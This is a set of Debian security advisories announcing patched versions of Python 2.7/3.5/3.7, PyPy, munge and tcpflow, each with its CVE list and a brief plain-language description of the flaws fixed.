Debian GNU/Linux 9 (Stretch) Extended LTS:
ELA-1641-1 python3.5 security update
Debian GNU/Linux 9 (Stretch) and 10 (Buster) Extended LTS:
ELA-1640-1 python2.7 security update
Debian GNU/Linux 10 (Buster) Extended LTS:
ELA-1642-1 python3.7 security update
ELA-1639-1 pypy security update
Debian GNU/Linux 11 (Bullseye) LTS:
[DLA 4477-1] munge security update
[DLA 4478-1] tcpflow security update
Debian GNU/Linux 12 (Bookworm) and 13 (Trixie):
[DSA 6129-1] munge security update
ELA-1642-1 python3.7 security update
Package : python3.7
Version : 3.7.3-2+deb10u11 (buster)
Related CVEs :
CVE-2025-4516
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-8291
CVE-2025-11468
CVE-2025-12084
CVE-2025-13837
CVE-2025-15282
CVE-2026-0672
CVE-2026-1299
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. This may cause memory corruption,
e-mail and HTTP headers injection, validation bypass of .zip archives,
and denial of service (DoS).
CVE-2025-4516
There is an issue in CPython when using
bytes.decode("unicode_escape", error="ignore|replace").
CVE-2025-6069
The html.parser.HTMLParser class had worse-case quadratic
complexity when processing certain crafted malformed inputs
potentially leading to amplified denial-of-service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-8291
The ‘zipfile’ module would not check the validity of the ZIP64 End
of Central Directory (EOCD) Locator record offset value would not
be used to locate the ZIP64 EOCD record, instead the ZIP64 EOCD
record would be assumed to be the previous record in the ZIP
archive. This could be abused to create ZIP archives that are
handled differently by the ‘zipfile’ module compared to other ZIP
implementations.
CVE-2025-11468
When folding a long comment in an email header containing
exclusively unfoldable characters, the parenthesis would not be
preserved. This could be used for injecting headers into email
messages where addresses are user-controlled and not sanitized.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2025-13837
When loading a plist file, the plistlib module reads data in size
specified by the file itself, meaning a malicious file can cause
OOM and DoS issues.
CVE-2025-15282
User-controlled data URLs parsed by urllib.request.DataHandler
allow injecting headers through newlines in the data URL
mediatype.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters can allow injecting HTTP headers into messages. Patch
rejects all control characters within cookie names, values, and
parameters.
CVE-2026-1299
The email module, specifically the “BytesGenerator” class, didn’t
properly quote newlines for email headers when serializing an
email message allowing for header injection when an email is
serialized.ELA-1642-1 python3.7 security update
ELA-1641-1 python3.5 security update
Package : python3.5
Version : 3.5.3-1+deb9u12 (stretch)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-8291
CVE-2025-12084
CVE-2025-13837
CVE-2025-15282
CVE-2026-0672
CVE-2026-1299
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. This may cause e-mail and HTTP
headers injection, validation bypass of .zip archives, and denial of
service (DoS).
CVE-2025-6069
The html.parser.HTMLParser class had worse-case quadratic
complexity when processing certain crafted malformed inputs
potentially leading to amplified denial-of-service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-8291
The ‘zipfile’ module would not check the validity of the ZIP64 End
of Central Directory (EOCD) Locator record offset value would not
be used to locate the ZIP64 EOCD record, instead the ZIP64 EOCD
record would be assumed to be the previous record in the ZIP
archive. This could be abused to create ZIP archives that are
handled differently by the ‘zipfile’ module compared to other ZIP
implementations.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2025-13837
When loading a plist file, the plistlib module reads data in size
specified by the file itself, meaning a malicious file can cause
OOM and DoS issues.
CVE-2025-15282
User-controlled data URLs parsed by urllib.request.DataHandler
allow injecting headers through newlines in the data URL
mediatype.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters can allow injecting HTTP headers into messages. Patch
rejects all control characters within cookie names, values, and
parameters.
CVE-2026-1299
The email module, specifically the “BytesGenerator” class, didn’t
properly quote newlines for email headers when serializing an
email message allowing for header injection when an email is
serialized.
ELA-1641-1 python3.5 security update
ELA-1640-1 python2.7 security update
Package : python2.7
Version : 2.7.13-2+deb9u12 (stretch), 2.7.16-2+deb10u7 (buster)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-12084
CVE-2026-0672
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. This may cause HTTP headers
injection and denial of service (DoS).
CVE-2025-6069
The html.parser.HTMLParser class had worse-case
quadratic complexity when processing certain crafted malformed inputs
potentially leading to amplified denial-of-service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters can allow injecting HTTP headers into messages. Patch
rejects all control characters within cookie names, values, and
parameters.
ELA-1640-1 python2.7 security update
ELA-1639-1 pypy security update
Package : pypy
Version : 7.0.0+dfsg-3+deb10u3 (buster)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-12084
CVE-2026-0672
Multiple vulnerabilities were discovered in PyPy, a fast, compliant
alternative implementation of the Python language.
All fixed vulnerabilities come from the embedded python2.7 standard
library. Please refer to
ELA-1640-1
for details.ELA-1639-1 pypy security update
[SECURITY] [DLA 4477-1] munge security update
- -------------------------------------------------------------------------
Debian LTS Advisory DLA-4477-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Thorsten Alteholz
February 10, 2026 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------
Package : munge
Version : 0.5.14-4+deb11u1
CVE ID : CVE-2026-25506
Titouan Lazard discovered a buffer overflow vulnerability in munge, an
authentication service to create and validate credentials, which may
allow local users to leak the MUNGE cryptographic key and forge
arbitrary credentials.
Additional details can be found in the upstream advisory:
https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh
For Debian 11 bullseye, this problem has been fixed in version
0.5.14-4+deb11u1.
We recommend that you upgrade your munge packages.
For the detailed security status of munge please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/munge
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 4478-1] tcpflow security update
- -------------------------------------------------------------------------
Debian LTS Advisory DLA-4478-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Paride Legovini
February 10, 2026 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------
Package : tcpflow
Version : 1.5.2+repack1-1+deb11u1
CVE ID : CVE-2026-25061
Debian Bug : #1126695
A bug has been found in the tcpflow package: a wrong length check in the
802.11 management frame parser allows a crafted frame with a large TIM
length to cause an out-of-bounds write, resulting in a DoS and potentially
in code execution.
For Debian 11 bullseye, this problem has been fixed in version
1.5.2+repack1-1+deb11u1.
We recommend that you upgrade your tcpflow packages.
For the detailed security status of tcpflow please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/tcpflow
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DSA 6129-1] munge security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-6129-1 security@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
February 10, 2026 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : munge
CVE ID : CVE-2026-25506
Titouan Lazard discovered a buffer overflow vulnerability in munge, an
authentication service to create and validate credentials, which may
allow local users to leak the MUNGE cryptographic key and forge
arbitrary credentials.
Additional details can be found in the upstream advisory:
https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh
For the oldstable distribution (bookworm), this problem has been fixed
in version 0.5.15-2+deb12u1.
For the stable distribution (trixie), this problem has been fixed in
version 0.5.16-1.1~deb13u1.
We recommend that you upgrade your munge packages.
For the detailed security status of munge please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/munge
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
